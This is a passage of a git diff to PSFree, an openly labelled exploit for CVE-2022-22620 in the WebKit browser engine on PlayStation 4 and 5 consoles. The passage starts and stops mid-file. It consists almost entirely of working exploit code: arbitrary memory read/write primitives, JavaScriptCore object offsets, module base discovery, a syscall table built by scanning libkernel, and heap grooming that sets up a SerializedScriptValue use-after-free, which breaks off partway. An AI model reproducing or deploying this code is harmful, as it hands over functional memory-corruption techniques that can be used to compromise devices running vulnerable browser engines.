-    // directly. All firmwares (PS4 and PS5) can read address 0 directly.
-    //
-    // See setIndex() from
-    // WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayView.h at PS4
-    // 8.03 for more information. Affected firmwares will get this error:
-    //
-    // TypeError: Underlying ArrayBuffer has been detached from the view
-    write0(size, offset, value) {
-        const i = offset + 1;
-        if (i >= 2**32 || i < 0) {
-            throw RangeError(`read0() invalid offset: ${offset}`);
-        }
-
-        this.set_addr(new Int(-1));
-
-        switch (size) {
-            case 8: {
-                this.worker[i] = value;
-            }
-            case 16: {
-                write16(this.worker, i, value);
-            }
-            case 32: {
-                write32(this.worker, i, value);
-            }
-            case 64: {
-                write64(this.worker, i, value);
-            }
-            default: {
-                throw RangeError(`write0() invalid size: ${size}`);
-            }
-        }
+        const main = this._main;
+        return new Addr(main[off_vector], main[off_vector2]);
     }
 
     read8(addr) {
         this.set_addr(addr);
-        return this.worker[0];
+        return this._worker.getUint8(0);
     }
 
     read16(addr) {
         this.set_addr(addr);
-        return read16(this.worker, 0);
+        return this._worker.getUint16(0, true);
     }
 
     read32(addr) {
         this.set_addr(addr);
-        return read32(this.worker, 0);
+        return this._worker.getUint32(0, true);
     }
 
     read64(addr) {
         this.set_addr(addr);
-        return read64(this.worker, 0);
+        const worker = this._worker;
+        return new Int(worker.getUint32(0, true), worker.getUint32(4, true));
     }
 
     // returns a pointer instead of an Int
     readp(addr) {
-        return new Addr(this.read64(addr));
+        this.set_addr(addr);
+        const worker = this._worker;
+        return new Addr(worker.getUint32(0, true), worker.getUint32(4, true));
+    }
+
+    read8_at(offset) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        return this._worker.getUint8(offset);
+    }
+
+    read16_at(offset) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        return this._worker.getUint16(offset, true);
+    }
+
+    read32_at(offset) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        return this._worker.getUint32(offset, true);
+    }
+
+    read64_at(offset) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        const worker = this._worker;
+        return new Int(
+            worker.getUint32(offset, true),
+            worker.getUint32(offset + 4, true),
+        );
+    }
+
+    readp_at(offset) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        const worker = this._worker;
+        return new Addr(
+            worker.getUint32(offset, true),
+            worker.getUint32(offset + 4, true),
+        );
     }
 
     write8(addr, value) {
         this.set_addr(addr);
-        this.worker[0] = value;
+        this._worker.setUint8(0, value);
     }
 
     write16(addr, value) {
         this.set_addr(addr);
-        write16(this.worker, 0, value);
+        this._worker.setUint16(0, value, true);
     }
 
     write32(addr, value) {
         this.set_addr(addr);
-        write32(this.worker, 0, value);
+        this._worker.setUint32(0, value, true);
     }
 
     write64(addr, value) {
+        const values = lohi_from_one(value);
         this.set_addr(addr);
-        write64(this.worker, 0, value);
-    }
-}
-
-export class Memory extends MemoryBase {
-    constructor(main, worker)  {
-        super();
-
-        this.main = main;
-        this.worker = worker;
-
-        // The initial creation of the "a" property will change the butterfly
-        // address. Do it now so we can cache it for addrof().
-        worker.a = 0; // dummy value, we just want to create the "a" property
-        this.butterfly = read64(main, o.js_butterfly);
-
-        write32(main, o.view_m_length, 0xffffffff);
-
-        this._current_addr = Int.Zero;
-
-        init_module(this);
+        const worker = this._worker;
+        worker.setUint32(0, values[0], true);
+        worker.setUint32(4, values[1], true);
+    }
+
+    write8_at(offset, value) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        this._worker.setUint8(offset, value);
+    }
+
+    write16_at(offset, value) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        this._worker.setUint16(offset, value, true);
+    }
+
+    write32_at(offset, value) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        this._worker.setUint32(offset, value, true);
+    }
+
+    write64_at(offset, value) {
+        if (!isInteger(offset)) {
+            throw TypeError('offset not a integer');
+        }
+        const values = lohi_from_one(value);
+        const worker = this._worker;
+        worker.setUint32(offset, values[0], true);
+        worker.setUint32(offset + 4, values[1], true);
     }
 }
diff --git a/module/memtools.mjs b/module/memtools.mjs
index 4404c53..3445ad2 100644
--- a/module/memtools.mjs
+++ b/module/memtools.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023-2024 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -18,13 +18,13 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 // This module are for utilities that depend on running the exploit first
 
 import { Int } from './int64.mjs';
-import { Addr, mem } from './mem.mjs';
+import { mem } from './mem.mjs';
 import { align } from './utils.mjs';
-import { KB } from './constants.mjs';
-import { read32 } from './rw.mjs';
+import { page_size } from './offset.mjs';
+import { BufferView } from './rw.mjs';
+import { View1 } from './view.mjs';
 
-import * as rw from './rw.mjs';
-import * as o from './offset.mjs';
+import * as off from './offset.mjs';
 
 // creates an ArrayBuffer whose contents is copied from addr
 export function make_buffer(addr, size) {
@@ -53,11 +53,11 @@ export function make_buffer(addr, size) {
     const u_addr = mem.addrof(u);
 
     // we won't change the butterfly and m_mode so we won't save those
-    const old_addr = u_addr.read64(o.view_m_vector);
-    const old_size = u_addr.read32(o.view_m_length);
+    const old_addr = u_addr.read64(off.view_m_vector);
+    const old_size = u_addr.read32(off.view_m_length);
 
-    u_addr.write64(o.view_m_vector, addr);
-    u_addr.write32(o.view_m_length, size);
+    u_addr.write64(off.view_m_vector, addr);
+    u_addr.write32(off.view_m_length, size);
 
     const copy = new Uint8Array(u.length);
     copy.set(u);
@@ -76,8 +76,8 @@ export function make_buffer(addr, size) {
     const res = copy.buffer;
 
     // restore
-    u_addr.write64(o.view_m_vector, old_addr);
-    u_addr.write32(o.view_m_length, old_size);
+    u_addr.write64(off.view_m_vector, old_addr);
+    u_addr.write32(off.view_m_length, old_size);
 
     return res;
 }
@@ -87,8 +87,8 @@ function check_magic_at(p, is_text) {
     // byte sequence that is very likely to appear at offset 0 of a .text
     // segment
     const text_magic = [
-        new Int([0x55, 0x48, 0x89, 0xe5, 0x41, 0x57, 0x41, 0x56]),
-        new Int([0x41, 0x55, 0x41, 0x54, 0x53, 0x50, 0x48, 0x8d]),
+        new Int(0xe5894855, 0x56415741),
+        new Int(0x54415541, 0x8d485053),
     ];
 
     // the .data "magic" is just a portion of the PT_SCE_MODULE_PARAM segment
@@ -137,8 +137,6 @@ function check_magic_at(p, is_text) {
 // addr.read8(-1);
 //
 export function find_base(addr, is_text, is_back) {
-    // ps4 page size
-    const page_size = 16 * KB;
     // align to page size
     addr = align(addr, page_size);
     const offset = (is_back ? -1 : 1) * page_size;
@@ -146,7 +144,7 @@ export function find_base(addr, is_text, is_back) {
         if (check_magic_at(addr, is_text)) {
             break;
         }
-        addr = addr.add(offset)
+        addr = addr.add(offset);
     }
     return addr;
 }
@@ -156,27 +154,27 @@ export function get_view_vector(view) {
     if (!ArrayBuffer.isView(view)) {
         throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`);
     }
-    return mem.addrof(view).readp(o.view_m_vector);
+    return mem.addrof(view).readp(off.view_m_vector);
 }
 
 export function resolve_import(import_addr) {
     if (import_addr.read16(0) !== 0x25ff) {
         throw Error(
             `instruction at ${import_addr} is not of the form: jmp qword`
-            + ' [rip + X]'
-        );
+            + ' [rip + X]');
     }
     // module_function_import:
     //     jmp qword [rip + X]
     //     ff 25 xx xx xx xx // signed 32-bit displacement
     const disp = import_addr.read32(2);
-    // sign extend
-    const offset = new Int(disp, disp >> 31);
+    // assume disp and offset are 32-bit integers
+    // x | 0 will always be a signed integer
+    const offset = (disp | 0) + 6;
     // The rIP value used by "jmp [rip + X]" instructions is actually the rIP
     // of the next instruction. This means that the actual address used is
     // [rip + X + sizeof(jmp_insn)], where sizeof(jmp_insn) is the size of the
     // jump instruction, which is 6 in this case.
-    const function_addr = import_addr.readp(offset.add(6));
+    const function_addr = import_addr.readp(offset);
 
     return function_addr;
 }
@@ -186,8 +184,9 @@ export function init_syscall_array(
     libkernel_web_base,
     max_search_size,
 ) {
-    if (typeof max_search_size !== 'number') {
-        throw TypeError(`max_search_size is not a number: ${max_search_size}`);
+    if (!Number.isInteger(max_search_size)) {
+        throw TypeError(
+            `max_search_size is not a integer: ${max_search_size}`);
     }
     if (max_search_size < 0) {
         throw Error(`max_search_size is less than 0: ${max_search_size}`);
@@ -197,7 +196,7 @@ export function init_syscall_array(
         libkernel_web_base,
         max_search_size,
     );
-    const kbuf = new Uint8Array(libkernel_web_buffer);
+    const kbuf = new BufferView(libkernel_web_buffer);
 
     // Search 'rdlo' string from libkernel_web's .rodata section to gain an
     // upper bound on the size of the .text section.
@@ -217,8 +216,7 @@ export function init_syscall_array(
     if (!found) {
         throw Error(
             '"rdlo" string not found in libkernel_web, base address:'
-            + ` ${libkernel_web_base}`
-        );
+            + ` ${libkernel_web_base}`);
     }
 
     // search for the instruction sequence:
@@ -236,10 +234,23 @@ export function init_syscall_array(
             && kbuf[i + 10] === 0x0f
             && kbuf[i + 11] === 0x05
         ) {
-            const syscall_num = read32(kbuf, i + 3);
+            const syscall_num = kbuf.read32(i + 3);
             syscall_array[syscall_num] = libkernel_web_base.add(i);
             // skip the sequence
             i += 11;
         }
     }
 }
+
+// create a char array like in the C language
+//
+// string to view since it's easier to get the address of the buffer this way
+export function cstr(str) {
+    str += '\0';
+    return View1.from(str, c => c.codePointAt(0));
+}
+
+// we are re-exporting this since users that want to use cstr() usually want
+// jstr() as well. they are likely working with functions that take/return
+// strings
+export { jstr } from './utils.mjs';
diff --git a/module/offset.mjs b/module/offset.mjs
index 509260c..74c9dc0 100644
--- a/module/offset.mjs
+++ b/module/offset.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -15,8 +15,16 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
+// WebKit offsets start
+
 // offsets for JSC::JSObject
+export const js_cell = 0;
 export const js_butterfly = 0x8;
+// start of the array of inline properties (JSValues)
+export const js_inline_prop = 0x10;
+
+// sizeof JSC::JSObject
+export const size_jsobj = js_inline_prop;
 
 // offsets for JSC::JSArrayBufferView
 export const view_m_vector = 0x10;
@@ -33,3 +41,22 @@ export const strimpl_inline_str = 0x14;
 
 // sizeof WTF::StringImpl
 export const size_strimpl = 0x18;
+
+// offsets for WebCore::JSHTMLTextAreaElement, subclass of JSObject
+
+// offset to m_wrapped, pointer to a DOM object
+// for this class, it's a WebCore::HTMLTextAreaElement pointer
+export const jsta_impl = 0x18;
+
+// sizeof WebCore::JSHTMLTextAreaElement
+export const size_jsta = 0x20;
+
+// WebKit offsets end
+
+export const KB = 1024;
+export const MB = KB * KB;
+export const GB = KB * KB * KB;
+export const page_size = 16 * KB; // page size on the ps4
+
+// size of the buffer used by setcontext/getcontext (see module/chain.mjs)
+export const context_size = 0xc8;
diff --git a/module/rw.mjs b/module/rw.mjs
index 7ebfb9e..2075817 100644
--- a/module/rw.mjs
+++ b/module/rw.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -15,7 +15,54 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
-import { Int } from './int64.mjs';
+import { Int, lohi_from_one } from './int64.mjs';
+
+// DataView's accessors are constant time and are faster when doing multi-byte
+// accesses but the single-byte accessors are slightly slower compared to just
+// indexing the Uint8Array
+//
+// to get the best of both worlds, BufferView uses a DataView for multi-byte
+// accesses and a Uint8Array for single-byte
+//
+// instances of BufferView will their have m_mode set to WastefulTypedArray
+// since we use the .buffer getter to create a DataView
+export class BufferView extends Uint8Array {
+    constructor(...args) {
+        super(...args);
+        this._dview = new DataView(this.buffer, this.byteOffset);
+    }
+
+    read16(offset) {
+        return this._dview.getUint16(offset, true);
+    }
+
+    read32(offset) {
+        return this._dview.getUint32(offset, true);
+    }
+
+    read64(offset) {
+        return new Int(
+            this._dview.getUint32(offset, true),
+            this._dview.getUint32(offset + 4, true),
+        );
+    }
+
+    write16(offset, value) {
+        this._dview.setUint16(offset, value, true);
+    }
+
+    write32(offset, value) {
+        this._dview.setUint32(offset, value, true);
+    }
+
+    write64(offset, value) {
+        const values = lohi_from_one(value);
+        this._dview.setUint32(offset, values[0], true);
+        this._dview.setUint32(offset + 4, values[1], true);
+    }
+}
+
+// WARNING: These functions are now deprecated. use BufferView instead.
 
 // view.buffer is the underlying ArrayBuffer of a TypedArray, but since we will
 // be corrupting the m_vector of our target views later, the ArrayBuffer's
@@ -58,11 +105,7 @@ export function read32(u8_view, offset) {
 }
 
 export function read64(u8_view, offset) {
-    let res = [];
-    for (let i = 0; i < 8; i++) {
-        res.push(u8_view[offset + i]);
-    }
-    return new Int(res);
+    return new Int(read32(u8_view, offset), read32(u8_view, offset + 4));
 }
 
 // for writes less than 8 bytes
@@ -85,8 +128,8 @@ export function write64(u8_view, offset, value) {
         throw TypeError('write64 value must be an Int');
     }
 
-    let low = value.low();
-    let high = value.high();
+    let low = value.lo;
+    let high = value.hi;
 
     for (let i = 0; i < 4; i++) {
         u8_view[offset + i]  = (low >>> i*8) & 0xff;
@@ -95,11 +138,3 @@ export function write64(u8_view, offset, value) {
         u8_view[offset + 4 + i]  = (high >>> i*8) & 0xff;
     }
 }
-
-export function sread64(str, offset) {
-    let res = [];
-    for (let i = 0; i < 8; i++) {
-        res.push(str.charCodeAt(offset + i));
-    }
-    return new Int(res);
-}
diff --git a/module/utils.mjs b/module/utils.mjs
index 23cf4a1..7c20ef1 100644
--- a/module/utils.mjs
+++ b/module/utils.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -17,32 +17,24 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
 import { Int } from './int64.mjs';
 
-export function die(msg) {
-    alert(msg);
-    undefinedFunction();
+export class DieError extends Error {
+    constructor(...args) {
+        super(...args);
+        this.name = this.constructor.name;
+    }
 }
 
-export function debug_log(msg) {
-    let textNode = document.createTextNode(msg);
-    let node = document.createElement("p").appendChild(textNode);
+export function die(msg='') {
+    throw new DieError(msg);
+}
 
-    document.body.appendChild(node);
-    document.body.appendChild(document.createElement("br"));
+const console = document.getElementById('console');
+export function log(msg='') {
+    console.append(msg + '\n');
 }
 
 export function clear_log() {
-    document.body.innerHTML = null;
-}
-
-export function str2array(str, length, offset) {
-    if (offset === undefined) {
-        offset = 0;
-    }
-    let a = new Array(length);
-    for (let i = 0; i < length; i++) {
-        a[i] = str.charCodeAt(i + offset);
-    }
-    return a;
+    console.innerHTML = null;
 }
 
 // alignment must be 32 bits and is a power of 2
@@ -52,8 +44,8 @@ export function align(a, alignment) {
     }
     const mask = -alignment & 0xffffffff;
     let type = a.constructor;
-    let low = a.low() & mask;
-    return new type(low, a.high());
+    let low = a.lo & mask;
+    return new type(low, a.hi);
 }
 
 export async function send(url, buffer, file_name, onload=() => {}) {
@@ -65,7 +57,7 @@ export async function send(url, buffer, file_name, onload=() => {}) {
     const form = new FormData();
     form.append('upload', file);
 
-    debug_log('send');
+    log('send');
     const response = await fetch(url, {method: 'POST', body: form});
 
     if (!response.ok) {
@@ -73,3 +65,108 @@ export async function send(url, buffer, file_name, onload=() => {}) {
     }
     onload();
 }
+
+// mostly used to yield to the GC. marking is concurrent but collection isn't
+//
+// yielding also lets the DOM update. which is useful since we use the DOM for
+// logging and we loop when waiting for a collection to occur
+export function sleep(ms=0) {
+    return new Promise(resolve => setTimeout(resolve, ms));
+}
+
+export function hex(number) {
+    return '0x' + number.toString(16);
+}
+
+// no "0x" prefix
+export function hex_np(number) {
+    return number.toString(16);
+}
+
+// expects a byte array
+export function hexdump(view) {
+    const num_16 = view.length & ~15;
+    const residue = view.length - num_16;
+    const max_off_len = hex_np(((view.length + 7) & ~7) - 1).length;
+
+    function chr(i) {
+        if (0x20 <= i && i <= 0x7e) {
+            return String.fromCodePoint(i);
+        }
+        return '.';
+    }
+
+    function to_hex(view, offset, length) {
+        return (
+            [...view.slice(offset, offset + length)]
+            .map(e => hex_np(e).padStart(2, '0'))
+            .join(' ')
+        );
+    }
+
+    let bytes = [];
+    for (let i = 0; i < num_16; i += 16) {
+        const long1 = to_hex(view, i, 8);
+        const long2 = to_hex(view, i + 8, 8);
+
+        let print = '';
+        for (let j = 0; j < 16; j++) {
+            print += chr(view[j]);
+        }
+
+        bytes.push([`${long1}  ${long2}`, print]);
+    }
+
+    if (residue) {
+        const small = residue <= 8;
+        const long1_len = small ? residue : 8;
+
+        let long1 = to_hex(view, num_16, long1_len);
+        if (small) {
+            for (let i = 0; i < 8 - residue; i++) {
+                long1 += ' xx';
+            }
+        }
+
+        const long2 = (() => {
+            if (small) {
+                return Array(8).fill('xx').join(' ');
+            }
+
+            let res = to_hex(view, num_16 + 8, residue - 8);
+            for (let i = 0; i < 16 - residue; i++) {
+                res += ' xx';
+            }
+
+            return res;
+        })();
+
+        let print = '';
+        for (let i = 0; i < residue; i++) {
+            print += chr(view[num_16 + i]);
+        }
+        for (let i = 0; i < 16 - residue; i++) {
+            print += ' ';
+        }
+
+        bytes.push([`${long1}  ${long2}`, print]);
+    }
+
+    for (const [pos, [val, print]] of bytes.entries()) {
+        const off = hex_np(pos * 16).padStart(max_off_len, '0');
+        log(`${off} | ${val} |${print}|`);
+    }
+}
+
+// make a JavaScript string
+export function jstr(buffer) {
+    let res = '';
+    for (const item of buffer) {
+        if (item === 0) {
+            break;
+        }
+        res += String.fromCodePoint(item);
+    }
+    // convert to primitive string
+    return String(res);
+}
diff --git a/module/view.mjs b/module/view.mjs
new file mode 100644
index 0000000..2c5666b
--- /dev/null
+++ b/module/view.mjs
@@ -0,0 +1,261 @@
+/* Copyright (C) 2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
+
+import { Int, lohi_from_one } from '/module/int64.mjs';
+import { Addr } from '/module/mem.mjs';
+import { BufferView } from '/module/rw.mjs';
+
+import * as config from '/config.mjs';
+import * as mt from '/module/memtools.mjs';
+
+// View constructors will always get the buffer property in order to make sure
+// that the JSArrayBufferView is a WastefulTypedArray. m_vector may change if
+// m_mode < WastefulTypedArray. This is to make caching the m_view field
+// possible. Users don't have to worry if the m_view they got from addr() is
+// possibly stale.
+//
+// see possiblySharedBuffer() from
+// WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h
+// at PS4 8.03
+//
+// Subclasses of TypedArray are still implemented as a JSArrayBufferView, so
+// get_view_vector() still works on them.
+
+function ViewMixin(superclass) {
+    const res = class extends superclass {
+        constructor(...args) {
+            super(...args);
+            this.buffer;
+        }
+
+        get addr() {
+            let res = this._addr_cache;
+            if (res !== undefined) {
+                return res;
+            }
+            res = mt.get_view_vector(this);
+            this._addr_cache = res;
+            return res;
+        }
+
+        get size() {
+            return this.byteLength;
+        }
+
+        addr_at(index) {
+            const size = this.BYTES_PER_ELEMENT;
+            return this.addr.add(index * size);
+        }
+
+        sget(index) {
+            return this[index] | 0;
+        }
+    };
+
+    // workaround for known affected versions: ps4 [6.00, 10.00)
+    //
+    // see from() and of() from
+    // WebKit/Source/JavaScriptCore/builtins/TypedArrayConstructor.js at PS4
+    // 8.0x
+    //
+    // @getByIdDirectPrivate(this, "allocateTypedArray") will fail when "this"
+    // isn't one of the built-in TypedArrays. this is a violation of the
+    // ECMAScript spec at that time
+    //
+    // TODO assumes ps4, support ps5 as well
+    // FIXME define the from/of workaround functions once
+    if (0x600 <= config.target && config.target < 0x1000) {
+        res.from = function from(...args) {
+            const base = this.__proto__;
+            return new this(base.from(...args).buffer);
+        };
+
+        res.of = function of(...args) {
+            const base = this.__proto__;
+            return new this(base.of(...args).buffer);
+        };
+    }
+
+    return res;
+}
+
+export class View1 extends ViewMixin(Uint8Array) {}
+export class View2 extends ViewMixin(Uint16Array) {}
+export class View4 extends ViewMixin(Uint32Array) {}
+
+export class Buffer extends BufferView {
+    get addr() {
+        let res = this._addr_cache;
+        if (res !== undefined) {
+            return res;
+        }
+        res = mt.get_view_vector(this);
+        this._addr_cache = res;
+        return res;
+    }
+
+    get size() {
+        return this.byteLength;
+    }
+
+    addr_at(index) {
+        return this.addr.add(index);
+    }
+}
+// see from() and of() comment above
+if (0x600 <= config.target && config.target < 0x1000) {
+    Buffer.from = function from(...args) {
+        const base = this.__proto__;
+        return new this(base.from(...args).buffer);
+    };
+    Buffer.of = function of(...args) {
+        const base = this.__proto__;
+        return new this(base.of(...args).buffer);
+    };
+}
+
+const VariableMixin = superclass => class extends superclass {
+    constructor(value=0) {
+        // unlike the View classes, we don't allow number coercion. we
+        // explicitly allow floats unlike Int
+        if (typeof value !== 'number') {
+            throw TypeError('value not a number');
+        }
+        super([value]);
+    }
+
+    addr_at(...args) {
+        throw TypeError('unimplemented method');
+    }
+
+    [Symbol.toPrimitive](hint) {
+        return this[0];
+    }
+
+    toString(...args) {
+        return this[0].toString(...args);
+    }
+};
+
+export class Byte extends VariableMixin(View1) {}
+export class Short extends VariableMixin(View2) {}
+// Int was already taken by int64.mjs
+export class Word extends VariableMixin(View4) {}
+
+export class LongArray {
+    constructor(length) {
+        this.buffer = new DataView(new ArrayBuffer(length * 8));
+    }
+
+    get addr() {
+        return mt.get_view_vector(this.buffer);
+    }
+
+    addr_at(index) {
+        return this.addr.add(index * 8);
+    }
+
+    get length() {
+        return this.buffer.length / 8;
+    }
+
+    get size() {
+        return this.buffer.byteLength;
+    }
+
+    get byteLength() {
+        return this.size;
+    }
+
+    get(index) {
+        const buffer = this.buffer;
+        const base = index * 8;
+        return new Int(
+            buffer.getUint32(base, true),
+            buffer.getUint32(base + 4, true),
+        );
+    }
+
+    set(index, value) {
+        const buffer = this.buffer;
+        const base = index * 8;
+        const values = lohi_from_one(value);
+
+        buffer.setUint32(base, values[0], true);
+        buffer.setUint32(base + 4, values[1], true);
+    }
+}
+
+// mutable Int (we are explicitly using Int's private fields)
+const Word64Mixin = superclass => class extends superclass {
+    constructor(...args) {
+        if (!args.length) {
+            return super(0);
+        }
+        super(...args);
+    }
+
+    get addr() {
+        // assume this is safe to cache
+        return mt.get_view_vector(this._u32);
+    }
+
+    get length() {
+        return 1;
+    }
+
+    get size() {
+        return 8;
+    }
+
+    get byteLength() {
+        return 8;
+    }
+
+    // no setters for top and bot since low/high can accept negative integers
+
+    get lo() {
+        return super.lo;
+    }
+
+    set lo(value) {
+        this._u32[0] = value;
+    }
+
+    get hi() {
+        return super.hi;
+    }
+
+    set hi(value) {
+        this._u32[1] = value;
+    }
+
+    set(value) {
+        const buffer = this._u32;
+        const values = lohi_from_one(value);
+
+        buffer[0] = values[0];
+        buffer[1] = values[1];
+    }
+};
+
+export class Long extends Word64Mixin(Int) {
+    as_addr() {
+        return new Addr(this);
+    }
+}
+export class Pointer extends Word64Mixin(Addr) {}
diff --git a/psfree.mjs b/psfree.mjs
new file mode 100644
index 0000000..b742fb0
--- /dev/null
+++ b/psfree.mjs
@@ -0,0 +1,863 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
+
+// PSFree is a WebKit exploit using CVE-2022-22620 to gain arbitrary read/write
+//
+// vulnerable:
+// * PS4 [6.00, 10.00)
+// * PS5 [1.00, 6.00)
+//
+// * CelesteBlue from ps4-dev on discord.com
+//   * Helped in figuring out the size of WebCore::SerializedScriptValue and
+//     its needed offsets on different firmwares.
+//   * figured out the range of vulnerable firmwares
+// * janisslsm from ps4-dev on discord.com
+//   * Helped in figuring out the size of JSC::ArrayBufferContents and its
+//     needed offsets on different firmwares.
+// * Kameleon_ from ps4-dev on discord.com - tester
+// * SlidyBat from PS5 R&D discord.com
+//   * Helped in figuring out the size of JSC::ArrayBufferContents and its
+//     needed offsets on different firmwares (PS5).
+
+import { Int } from '/module/int64.mjs';
+import { Memory } from '/module/mem.mjs';
+import { KB, MB } from '/module/offset.mjs';
+import { BufferView } from '/module/rw.mjs';
+
+import {
+    die,
+    DieError,
+    log,
+    clear_log,
+    sleep,
+    hex,
+    align,
+} from '/module/utils.mjs';
+
+import * as config from '/config.mjs';
+import * as off from '/module/offset.mjs';
+
+// check if we are running on a supported firmware version
+const [is_ps4, version] = (() => {
+    const value = config.target;
+    const is_ps4 = (value & 0x10000) === 0;
+    const version = value & 0xffff;
+    const [lower, upper] = (() => {
+        if (is_ps4) {
+            return [0x600, 0x1000];
+        } else {
+            return [0x100, 0x600];
+        }
+    })();
+
+    if (!(lower <= version && version < upper)) {
+        throw RangeError(`invalid config.target: ${hex(value)}`);
+    }
+
+    return [is_ps4, version];
+})();
+
+const ssv_len = (() => {
+    if (0x600 <= config.target && config.target < 0x650) {
+        return 0x58;
+    }
+
+    // PS4 9.xx and all supported PS5 versions
+    if (config.target >= 0x900) {
+        return 0x50;
+    }
+
+    if (0x650 <= config.target && config.target < 0x900) {
+        return 0x48;
+    }
+})();
+
+// these constants are expected to be divisible by 2
+const num_fsets = 0x180;
+const num_spaces = 0x40;
+const num_adjs = 8;
+
+const num_reuses = 0x300;
+const num_strs = 0x200;
+const num_leaks = 0x100;
+
+// we can use the rows attribute of a frameset to allocate from fastMalloc
+//
+// see parseAttribute() from
+// WebKit/Source/WebCore/html/HTMLFrameSetElement.cpp at PS4 8.0x
+//
+// parseAttribute() will call newLengthArray():
+//
+// UniqueArray<Length> newLengthArray(const String& string, int& len)
+// {
+//     RefPtr<StringImpl> str = string.impl()->simplifyWhiteSpace();
+//     ...
+//     len = countCharacter(*str, ',') + 1; [1]
+//     auto r = makeUniqueArray<Length>(len); [2]
+//     ...
+// }
+//
+// pseudocode definition:
+//
+// class UniqueArray<Length>:
+//     size_t _size; [3]
+//     Length _data[];
+//
+// [2] allocates from the fastMalloc heap. [1] will add an additional 1 to len.
+// [3] adds an extra 8 bytes to the array
+//
+// a Length is 8 bytes in size. if we want to allocate ssv_len bytes from
+// fastMalloc, then we need:
+//
+// const num_repeats = ssv_len / 8 - 2;
+// const rows = ','.repeat(num_repeats);
+const rows = ','.repeat(ssv_len / 8 - 2);
+
+const original_strlen = ssv_len - off.size_strimpl;
+const original_loc = location.pathname;
+
+function gc() {
+    new Uint8Array(4 * MB);
+}
+
+function sread64(str, offset) {
+    const low = (
+        str.charCodeAt(offset)
+        | str.charCodeAt(offset + 1) << 8
+        | str.charCodeAt(offset + 2) << 16
+        | str.charCodeAt(offset + 3) << 24
+    );
+    const high = (
+        str.charCodeAt(offset + 4)
+        | str.charCodeAt(offset + 5) << 8
+        | str.charCodeAt(offset + 6) << 16
+        | str.charCodeAt(offset + 7) << 24
+    );
+    return new Int(low, high);
+}
+
+function prepare_uaf() {
+    const fsets = [];
+    const indices = [];
+
+    function alloc_fs(fsets, size) {
+        for (let i = 0; i < size / 2; i++) {
+            const fset = document.createElement('frameset');
+            fset.rows = rows;
+            fset.cols = rows;
+            fsets.push(fset);
+        }
+    }
+
+    // the first call to either replaceState/pushState is likely to allocate a
+    // JSC::IsoAlignedMemoryAllocator near the SSV it creates. this prevents
+    // the SmallLine where the SSV resides from being freed. so we do a dummy
+    // call first
+    history.replaceState('state0', '');
+
+    alloc_fs(fsets, num_fsets);
+
+    // the "state1" SSVs is what we will UAF
+
+    history.pushState('state1', '', original_loc + '#bar');
+    indices.push(fsets.length);
+
+    alloc_fs(fsets, num_spaces);
+
+    history.pushState('state1', '', original_loc + '#foo');
+    indices.push(fsets.length);
+
+    alloc_fs(fsets, num_spaces);
+
+    history.pushState('state2', '');
+    return [fsets, indices];
+}
+
+// WebCore::SerializedScriptValue use-after-free
+//
+// be careful when accessing history.state since History::state() will get
+// called. History will cache the SSV at its m_lastStateObjectRequested if you
+// do. that field is a RefPtr, thus preventing a UAF if we cache "state1"
+async function uaf_ssv(fsets, index, index2) {
+    const views = [];
+    const input = document.createElement('input');
+    input.id = 'input';
+    const foo = document.createElement('input');
+    foo.id = 'foo';
+    const bar = document.createElement('a');
+    bar.id = 'bar';
+
+    log(`ssv_len: ${hex(ssv_len)}`);
+
+    let pop = null;
+    let pop2 = null;
+    let pop_promise2 = null;
+    let blurs = [0, 0];
+    let resolves = [];
+
+    function onpopstate(event) {
+        const no_pop = pop === null;
+        const idx = no_pop ? 0 : 1;
+
+        log(`pop ${idx} came`);
+        if (blurs[idx] === 0) {
+            const r = resolves[idx][1];
+            r(new DieError(`blurs before pop ${idx} came: ${blurs[idx]}`));
+        }
+
+        if (no_pop) {
